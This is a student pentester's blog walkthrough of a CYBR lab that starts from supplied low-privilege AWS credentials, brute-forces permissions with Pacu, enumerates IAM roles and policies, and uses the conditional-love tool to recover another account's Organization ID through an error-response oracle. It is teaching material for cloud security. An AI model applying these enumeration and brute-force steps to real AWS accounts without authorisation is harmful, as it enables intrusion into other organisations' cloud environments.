Discover AWS Organization ID Via S3 Bucket

 Welcome to my cybersecurity blog! i'm Basit Hassan, a student penetration tester passionate about ethical hacking. On this blog, i'll be sharing tutorials, walkthroughs, and real-world exploitation techniques  that i've personally tested and can get you started in the penetration testing field.


Today's post is about AWS pentesting using an assume breached scenario, where the target  organization provide you with low level credentials,command line interface credentials that you can connect to the AWS CLI (Command Line Interface) with. 

Let The Hacking Begin!!!!

we will be using platform called CYBR click on the url and create a free account and do this lab along side with me https://cybr.com/hands-on-labs/lab/discover-aws-organization-id-via-s3-bucket/ this is how the interface looks like below πŸ‘‡πŸ‘‡after creating  an account and starting the lab 

once it's ready you are going to get an Access key ID and a Secret Access key. So now if you are new to AWS that's completely fine the goal of this blog is to walk you through so that even a beginner will be able to follow along.

The first step with AWS is connecting to the account from the CLI (command line interface).  In this lab that is why we are given an Access key ID and a Secret Access key it's like a username and a password, Your Access key ID is not that sensitive unlike your Secret Access key you do not want this to get exposed it more like your password.

So today what we are going to try to do is with this account we are going to do an enumeration, our end goal is to Discover An AWS Organization via S3 Bucket.  I know as a beginner like  you and i those term or words are probably confusing, So in AWS an organization ID is kind of the top level for an organization underneath the organization ID we can a multiple AWS account maybe an account for Red teams, an account for Blue teams, or an account for DEVS. But the organization ID is the top of all  i mentioned, while S3 Bucket is what is use to store different files.  So what this lab is going to show us is how to use a  tool called conditional-love to go from S3 Bucket in a completely different organization and the account we are in and use it to figure out the overall organization ID which should not be possible with just S3 Bucket.

Step1: AWS cli Installation

The first step is installing AWS CLI (Command Line Interface). I will show you how you can install AWS cli on any OS you use.
1. For Linux
copy and paste this in your terminal curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
2. For Macos
  1. In your browser, download the macOS pkg file: https://awscli.amazonaws.com/AWSCLIV2.pkg

  2. Run your downloaded file and follow the on-screen instructions. You can choose to install the AWS CLI in the following ways:

    • For all users on the computer (requires sudo)

      • You can install to any folder, or choose the recommended default folder of /usr/local/aws-cli.

      • The installer automatically creates a symlink at /usr/local/bin/aws that links to the main program in the installation folder you chose.

    • For only the current user (doesn't require sudo)

      • You can install to any folder to which you have write permission.

      • Due to standard user permissions, after the installer finishes, you must manually create a symlink file in your $PATH that points to the aws and aws_completer programs by using the following commands at the command prompt. If your $PATH includes a folder you can write to, you can run the following command without sudo if you specify that folder as the target's path. If you don't have a writable folder in your $PATH, you must use sudo in the commands to get permissions to write to the specified target folder. The default location for a symlink is /usr/local/bin/.

        $ sudo ln -s /folder/installed/aws-cli/aws /usr/local/bin/aws $ sudo ln -s /folder/installed/aws-cli/aws_completer /usr/local/bin/aws_completer
    Note

    You can view debug logs for the installation by pressing Cmd+L anywhere in the installer. This opens a log pane that enables you to filter and save the log. The log file is also automatically saved to /var/log/install.log.

  3. To verify that the shell can find and run the aws command in your $PATH, use the following commands.

    $ which aws /usr/local/bin/aws $ aws --version aws-cli/2.25.11 Python/3.11.6 Darwin/23.3.0
    If the aws command cannot be found, you might need to restart your terminal or follow the troubleshooting in Troubleshooting errors for the AWS CLI.
 3. For Windows
  1. Download and run the AWS CLI MSI installer for Windows (64-bit):

    https://awscli.amazonaws.com/AWSCLIV2.msi

    Alternatively, you can run the msiexec command to run the MSI installer.

    C:\> msiexec.exe /i https://awscli.amazonaws.com/AWSCLIV2.msi

    For various parameters that can be used with msiexec, see msiexec on the Microsoft Docs website. For example, you can use the /qn flag for a silent installation.

    C:\> msiexec.exe /i https://awscli.amazonaws.com/AWSCLIV2.msi /qn
  2. To confirm the installation, open the Start menu, search for cmd to open a command prompt window, and at the command prompt use the aws --version command.

    C:\> aws --version aws-cli/2.25.11 Python/3.11.6 Windows/10 exe/AMD64 prompt/off

    If Windows is unable to find the program, you might need to close and reopen the command prompt window to refresh the path, or follow the troubleshooting in Troubleshooting errors for the AWS CLI.

once you have that done you have your aws cli installed

Step2: Profile Configuration

The next step is to setup a profile using the credentials we were given in the lab, so we will be doing that using the AWS cli. 
On your CLI you will input this 
┌──(p3lla㉿kali)-[~]
└─$ aws configure --profile cybr
it will ask for AWS Access Key ID you input that it will ask for the Secret Access Key also input that you can chose your region and configure everything as seen belowπŸ‘‡πŸ‘‡
──(p3lla㉿kali)-[~]
└─$ aws configure --profile cybr
AWS Access Key ID [None]: ***********************************
AWS Secret Access Key [None]: ***********************************
Default region name [None]: 
Default output format [None]: json

Step3: Credentials Confirmation

The next step is to know who we are if the credentials are correct, so basically to those that use any Linux distros we use the command "whoami" to check who we are but here on AWS it is a bit hard and different so we use "aws sts get-caller-identity --profile cybr" as seen below πŸ‘‡πŸ‘‡

┌──(p3lla㉿kali)-[~]
└─$ aws sts get-caller-identity --profile cybr
{
    "UserId": "AIDAQGYBPW3ZF7RMUWU7W",
    "Account": "014498641650",
    "Arn": "arn:aws:iam::014498641650:user/Daniel"
}
Now we know our credentials are correct we have the  username daniel.

Step4: Trying to check permissions the user have 

Just like Linux, I know most of you wonder why i keep using Linux as an example πŸ˜… well is because i use it okay! let's get straight to the point. In Linux and other OS when a user is compromised we try to see the type of permissions we have. so we will be using a tool called Pacu, pacu is like metasploit for the cloud to those that know metasploit hehe!!
How to install Pacu
Go to your search engine search "pacu github"  click the first link grab the code i helped you out already, Now we are going to install it using pipx if you don't have pipx installed install it after that do as seen below πŸ‘‡πŸ‘‡
┌──(p3lla㉿kali)-[~]
└─$ pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
Run on your terminal this help install pacu i already installed mine so i stopped it.

Once pacu is installed let's go!!

After launching pacu you're asked to name the session so i named it "cybr". So we will be using pacu to check the permissions the user have.

The first thing we will be doing is to import the access key on pacu 


once the keys are imported we try to brute force permissions to that account using pacu as seen below

after that run the "run iam__bruteforce_permissions --region us-east-1 " command to see permissions the account has, i added the tag --region to make the brute force fast by telling it my region .


I found something interesting the permission to  list roles there might be a role that  might be interesting to us as a pentester that's why i highlighted it out now let's look it up.

After looking it up there is a whole bunch of role, to make it short i only choose the one i know i might find something interesting so the role i found is "S3AccessImages". It might seem overwhelming finding a role you can use as a leverage, you can just take your time and look for it. Here is the command i use to list the roles below πŸ‘‡πŸ‘‡

┌──(p3lla㉿kali)-[~]

└─$ aws iam list-roles --profile cybr

when this is launched you will use the enter key to keep going down the bunch of roles in your CLI, so all i did is find a role i  can use as a leverage to elevate my priviledge  so this is the role i found below 

we need to get the role policy to know what this role allow the user account we are authenticated to can do, by doing that we use this command below 

Now that we have gotten the policy name which is "AccessS3Bucket0bjects", with the policy name we can get more information about what the policy allows so we will do that below 

After launching the command we have two resources (which i highlighted) that are found in a S3 Bucket which allow whoever is in this role to checkout what is in this bucket, But this bucket belongs to a different AWS account but the account is not specified in the resources. SO this bucket doesn't belong to the organization ID of this account and remember the purpose of this lab is to figure out what's the organization ID of this bucket and you know once the organization ID can be gotten it can be use for different stuffs. so we will be using a tool called conditional-love.

Conditional love

conditional-love is an AWS metadata enumeration tool use to enumerate resource tags, account IDs, org IDs etc. Since we are trying to get which organization ID this S3 Bucket belongs too we will be using this tool.

How to install and use conditional-love for enumeration 

Go to the url https://github.com/plerionhq/conditional-love and then grab the code which is "https://github.com/plerionhq/conditional-love.git", then go to your terminal and input this command to git clone it 
──(p3lla㉿kali)-[~]
└─$ sudo git clone https://github.com/plerionhq/conditional-love.git
[sudo] password for p3lla: 
fatal: destination path 'conditional-love' already exists and is not an empty directory.
i got that error cause i have it installed already so the next step is to ls into the file and you will see they are some requirement in the requirement.txt file, we will need to setup a python virtual environment so we won't break all of our python packages so follow the steps in the screenshot belowπŸ‘‡πŸ‘‡
once you cd(change directory) into conditional-love and list all files you then use the command python3 (cause we are creating a python environment ) -m for module then what we are creating is a virtual environment which is the venv follow by the environment name i use "condenv" you can use anything and then use this "source condenv/bin/activate" to activate the environment and install all requirements as seen in the screenshot above πŸ‘†πŸ‘†.
So now let's get the organization ID to know the syntax of the command you can launch 
┌──(condenv)─(p3lla㉿kali)-[~/conditional-love]
└─$ python3 conditional-love.py -h 
that will help you in using this tool, so this is the syntax below we will use to get the organization ID i won't drop the full organization ID i got, I showed only one letter in the screenshot so make sure you get yours complete to solve the lab 

so what this does is that it brute force (i.e it tries all possible combinations of letters and numbers) organization ID character by character, based on how AWS respond to the request. remember it's because of the resources we saw in the s3 Bucket ""arn:aws:s3:::img.cybrlabs.io/*" does not belong to the user organization ID we are authenticated with, Conditional Love uses this role which we use to access the resources  to try and assume permissions and access the target resource.

As seen in the conditional-love enumeration i will explain each and every tag πŸ‘‡πŸ‘‡
--python3 conditional-love:- which is the environment and the tool we will be using.
--role:- This uses the arn of role "s3AccessImages" to try and assume permissions and access the target resource, remember we got the arn when we listed the roles where we found this role.
--target:- which is the resource "s3://img.cybrlabs.io" we found in the s3 Bucket that doesn't belong to our organization ID.
--action:- "s3:HeadObject" is an AWS action that checks metadata about an object in a bucket — like size, last modified date, etc. so what this does is it try all possible combination one character at a time in the request using the role we inputted 

AWS checks the request against the bucket’s policy.

  • If the partial Organization ID is completely wrong, AWS returns a generic AccessDenied error immediately.

  • But if your guess is partially correct, AWS might return a different error (or even let the request go deeper into policy evaluation).

Conditional Love observes these differences.It watches the response and infers when it's getting closer to the correct Organization ID.
--condition:- The condition will be "aws:ResourceOrgID" since we are trying to brute force the organization ID of the resource we saw.
--alphabet:- since we know organization ID is alphanumeric characters it could be any of this character "0123456789abcdefghijklmnopqrstuvwxyz", this is more like a custom wordlist to those that bruteforce.

I know how it can be overwhelmed by the syntax of AWS commands and IAM policies it seems a bit hard  — you’re not alone. It's not necessary to memorize everything. The key is to keep practicing, and over time, the patterns and logic will start to make sense.

With the help of Generative AI tools like ChatGPT, you’re never really stuck — when something confuses you, just ask. Whether it’s understanding a permission boundary or crafting a valid assume-role command, support is just a question away.

Consistency beats cramming. So keep breaking things (safely) and rebuilding — that’s how you truly master cloud pentesting.

Summary

In this lab, we demonstrated how a compromised IAM user's credentials can be used to:

  • Enumerate AWS Identity and Access Management (IAM) roles and permissions.

  • Exploit S3 bucket policies to discover the AWS Organization ID.

  • Use tools like Pacu and Conditional-Love to automate privilege escalation attempts.

  • Learn about real-world AWS misconfigurations in a safe, hands-on lab environment.

Understanding and practicing these techniques helps reinforce key cloud pentesting concepts such as assume-role abuse, IAM privilege enumeration, and sensitive information discovery.

Disclaimer:
This blog post is for educational purposes only. All activities were performed in a controlled lab environment provided by CYBR's Assume Breach: AWS Edition.
Do not attempt these techniques on any systems or cloud accounts you do not own or have explicit permission to test. Unauthorized testing is illegal and unethical.

About the Author

Basit Hassan

Cybersecurity Enthusiast | Student penetration Tester

Basit is a passionate cybersecurity learner on the path to becoming a well-rounded penetration tester. I don't limit myself to one domain—I'm diving into web, system, network, and cloud security to understand how attackers think and how defenses work. Through this blog, I share hands-on experiences, labs, and write-ups that simplify complex topics for anyone starting or growing in this field. My goal? Learn, break things (ethically), and help others do the same.

Comments

Popular posts from this blog

Using Hydra to Brute-Force SSH And WI-Fi Login Portal

SMB Relay Attack in AD Lab (Step-by-Step)